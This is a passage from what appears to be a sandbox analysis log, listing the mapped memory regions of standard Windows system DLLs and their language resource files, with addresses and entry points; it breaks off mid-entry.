Region: id = 4156 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4157 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 4158 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4159 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 4160 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4161 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 4162 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4163 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 4165 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4166 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 4167 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4168 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 4169 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4170 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 4171 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4172 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 4173 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4174 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 4175 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4176 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 4177 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4178 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 4179 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4180 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 4181 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4182 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 4183 start_va = 0xb90000 end_va = 0xbdffff monitored = 0 entry_point = 0xb92b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4184 start_va = 0xc60000 end_va = 0xc72fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 4185 start_va = 0xde0000 end_va = 0xe6afff monitored = 0 entry_point = 0xe551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 4186 start_va = 0xb90000 end_va = 0xb99fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 4187 start_va = 0xde0000 end_va = 0xe6afff monitored = 0 entry_point = 0xe551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 4188 start_va = 0xb90000 end_va = 0xb99fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 4189 start_va = 0xde0000 end_va = 0xe6afff monitored = 0 entry_point = 0xe551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 4190 start_va = 0xb90000 end_va = 0xb99fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 4191 start_va = 0xde0000 end_va = 0xe6afff monitored = 0 entry_point = 0xe551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 4192 start_va = 0xb90000 end_va = 0xb99fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 4194 start_va = 0xde0000 end_va = 0xe6afff monitored = 0 entry_point = 0xe551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 4195 start_va = 0xb90000 end_va = 0xb99fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 4196 start_va = 0xde0000 end_va = 0xe6afff monitored = 0 entry_point = 0xe551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 4197 start_va = 0xb90000 end_va = 0xb99fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 4198 start_va = 0xde0000 end_va = 0xe6afff monitored = 0 entry_point = 0xe551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 4199 start_va = 0xb90000 end_va = 0xb99fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 4200 start_va = 0xde0000 end_va = 0xe6afff monitored = 0 entry_point = 0xe551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 4201 start_va = 0xb90000 end_va = 0xb99fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 4202 start_va = 0xde0000 end_va = 0xe6afff monitored = 0 entry_point = 0xe551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 4203 start_va = 0xb90000 end_va = 0xb99fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 4204 start_va = 0xde0000 end_va = 0xe6afff monitored = 0 entry_point = 0xe551ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 4205 start_va = 0xb90000 end_va = 0xb99fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 4206 start_va = 0xb90000 end_va = 0xba9fff monitored = 1 entry_point = 0xb91380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 4207 start_va = 0xbb0000 end_va = 0xbbbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 4208 start_va = 0xb90000 end_va = 0xba9fff monitored = 1 entry_point = 0xb91380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 4209 start_va = 0xbb0000 end_va = 0xbbbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 4210 start_va = 0xb90000 end_va = 0xba9fff monitored = 1 entry_point = 0xb91380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 4211 start_va = 0xbb0000 end_va = 0xbbbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 4212 start_va = 0xb90000 end_va = 0xba9fff monitored = 1 entry_point = 0xb91380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 4213 start_va = 0xbb0000 end_va = 0xbbbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 4214 start_va = 0xb90000 end_va = 0xba9fff monitored = 1 entry_point = 0xb91380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 4215 start_va = 0xbb0000 end_va = 0xbbbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 4217 start_va = 0xb90000 end_va = 0xba9fff monitored = 1 entry_point = 0xb91380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 4218 start_va = 0xbb0000 end_va = 0xbbbfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 4219 start_va = 0xb90000 end_va = 0xbb7fff monitored = 0 entry_point = 0xb91860 region_type = mapped_file name = "umpo.dll" filename = "\\Windows\\System32\\umpo.dll" (normalized: "c:\\windows\\system32\\umpo.dll") Region: id = 4220 start_va = 0xbc0000 end_va = 0xbc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "umpo.dll.mui" filename = "\\Windows\\System32\\en-US\\umpo.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\umpo.dll.mui") Region: id = 4221 start_va = 0xb90000 end_va = 0xbb7fff monitored = 0 entry_point = 0xb91860 region_type = mapped_file name = "umpo.dll" filename = "\\Windows\\System32\\umpo.dll" (normalized: "c:\\windows\\system32\\umpo.dll") Region: id = 4222 start_va = 0xbc0000 end_va = 0xbc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "umpo.dll.mui" filename = "\\Windows\\System32\\en-US\\umpo.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\umpo.dll.mui") Region: id = 4223 start_va = 0xb90000 end_va = 0xb9afff monitored = 0 entry_point = 0xb911a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 4224 start_va = 0xba0000 end_va = 0xba1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 4225 start_va = 0xb90000 end_va = 0xb9afff monitored = 0 entry_point = 0xb911a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 4226 start_va = 0xba0000 end_va = 0xba1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 4227 start_va = 0xb90000 end_va = 0xb9afff monitored = 0 entry_point = 0xb911a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 4228 start_va = 0xba0000 end_va = 0xba1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 4229 start_va = 0xb90000 end_va = 0xb9afff monitored = 0 entry_point = 0xb911a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 4230 start_va = 0xba0000 end_va = 0xba1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 4231 start_va = 0xb90000 end_va = 0xb9afff monitored = 0 entry_point = 0xb911a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 4232 start_va = 0xba0000 end_va = 0xba1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 4233 start_va = 0xb90000 end_va = 0xb9afff monitored = 0 entry_point = 0xb911a8 region_type = mapped_file name = "httpapi.dll" filename = "\\Windows\\System32\\httpapi.dll" (normalized: "c:\\windows\\system32\\httpapi.dll") Region: id = 4234 start_va = 0xba0000 end_va = 0xba1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "httpapi.dll.mui" filename = "\\Windows\\System32\\en-US\\httpapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\httpapi.dll.mui") Region: id = 4235 start_va = 0xb90000 end_va = 0xb9dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PSEvents.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\psevents.dll") Region: id = 4236 start_va = 0xba0000 end_va = 0xbadfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\PSEvents.dll.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\psevents.dll.mui") Region: id = 4237 start_va = 0xb90000 end_va = 0xb9dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PSEvents.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\psevents.dll") Region: id = 4238 start_va = 0xba0000 end_va = 0xbadfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "psevents.dll.mui" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\PSEvents.dll.mui" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\psevents.dll.mui") Region: id = 4239 start_va = 0x1260000 end_va = 0x2054fff monitored = 0 entry_point = 0x1343268 region_type = mapped_file name = "wmp.dll" filename = "\\Windows\\System32\\wmp.dll" (normalized: "c:\\windows\\system32\\wmp.dll") Region: id = 4240 start_va = 0x1260000 end_va = 0x2054fff monitored = 0 entry_point = 0x1343268 region_type = mapped_file name = "wmp.dll" filename = "\\Windows\\System32\\wmp.dll" (normalized: "c:\\windows\\system32\\wmp.dll") Region: id = 4242 start_va = 0xde0000 end_va = 0xe89fff monitored = 0 entry_point = 0xdf4100 region_type = mapped_file name = "netlogon.dll" filename = "\\Windows\\System32\\netlogon.dll" (normalized: "c:\\windows\\system32\\netlogon.dll") Region: id = 4243 start_va = 0xb90000 end_va = 0xb93fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netlogon.dll.mui" filename = "\\Windows\\System32\\en-US\\netlogon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netlogon.dll.mui") Region: id = 4244 start_va = 0xde0000 end_va = 0xe89fff monitored = 0 entry_point = 0xdf4100 region_type = mapped_file name = "netlogon.dll" filename = "\\Windows\\System32\\netlogon.dll" (normalized: "c:\\windows\\system32\\netlogon.dll") Region: id = 4245 start_va = 0xb90000 end_va = 0xb93fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netlogon.dll.mui" filename = "\\Windows\\System32\\en-US\\netlogon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netlogon.dll.mui") Region: id = 4246 start_va = 0xb90000 end_va = 0xbd7fff monitored = 0 entry_point = 0xbcfd0c region_type = mapped_file name = "drt.dll" filename = "\\Windows\\System32\\drt.dll" (normalized: "c:\\windows\\system32\\drt.dll") Region: id = 4247 start_va = 0xc60000 end_va = 0xc62fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "drt.dll.mui" filename = "\\Windows\\System32\\en-US\\drt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\drt.dll.mui") Region: id = 4248 start_va = 0xb90000 end_va = 0xbd7fff monitored = 0 entry_point = 0xbcfd0c region_type = mapped_file name = "drt.dll" filename = "\\Windows\\System32\\drt.dll" (normalized: "c:\\windows\\system32\\drt.dll") Region: id = 4249 start_va = 0xc60000 end_va = 0xc62fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "drt.dll.mui" filename = "\\Windows\\System32\\en-US\\drt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\drt.dll.mui") Region: id = 4250 start_va = 0xde0000 end_va = 0xec8fff monitored = 0 entry_point = 0xeb906c region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 4251 start_va = 0xb90000 end_va = 0xb98fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 4252 start_va = 0xde0000 end_va = 0xec8fff monitored = 0 entry_point = 0xeb906c region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 4253 start_va = 0xb90000 end_va = 0xb98fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 4255 start_va = 0xde0000 end_va = 0xec8fff monitored = 0 entry_point = 0xeb906c region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 4256 start_va = 0xb90000 end_va = 0xb98fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 4257 start_va = 0xde0000 end_va = 0xec8fff monitored = 0 entry_point = 0xeb906c region_type = mapped_file name = "ndis.sys" filename = "\\Windows\\System32\\drivers\\ndis.sys" (normalized: "c:\\windows\\system32\\drivers\\ndis.sys") Region: id = 4258 start_va = 0xb90000 end_va = 0xb98fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ndis.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\ndis.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\ndis.sys.mui") Region: id = 4259 start_va = 0x1260000 end_va = 0x13acfff monitored = 0 entry_point = 0x1362a88 region_type = mapped_file name = "peerdistsvc.dll" filename = "\\Windows\\System32\\PeerDistSvc.dll" (normalized: "c:\\windows\\system32\\peerdistsvc.dll") Region: id = 4260 start_va = 0xb90000 end_va = 0xb95fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "peerdistsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\PeerDistSvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\peerdistsvc.dll.mui") Region: id = 4261 start_va = 0x1260000 end_va = 0x13acfff monitored = 0 entry_point = 0x1362a88 region_type = mapped_file name = "peerdistsvc.dll" filename = "\\Windows\\System32\\PeerDistSvc.dll" (normalized: "c:\\windows\\system32\\peerdistsvc.dll") Region: id = 4262 start_va = 0xb90000 end_va = 0xb95fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "peerdistsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\PeerDistSvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\peerdistsvc.dll.mui") Region: id = 4263 start_va = 0xb90000 end_va = 0xb9efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll" filename = "\\Windows\\System32\\WsmRes.dll" (normalized: "c:\\windows\\system32\\wsmres.dll") Region: id = 4264 start_va = 0xde0000 end_va = 0xe39fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll.mui" filename = "\\Windows\\System32\\en-US\\WsmRes.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wsmres.dll.mui") Region: id = 4265 start_va = 0xb90000 end_va = 0xb9efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll" filename = "\\Windows\\System32\\WsmRes.dll" (normalized: "c:\\windows\\system32\\wsmres.dll") Region: id = 4267 start_va = 0xde0000 end_va = 0xe39fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wsmres.dll.mui" filename = "\\Windows\\System32\\en-US\\WsmRes.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wsmres.dll.mui") Region: id = 4268 start_va = 0xb90000 end_va = 0xb9ffff monitored = 0 entry_point = 0xb9a33c region_type = mapped_file name = 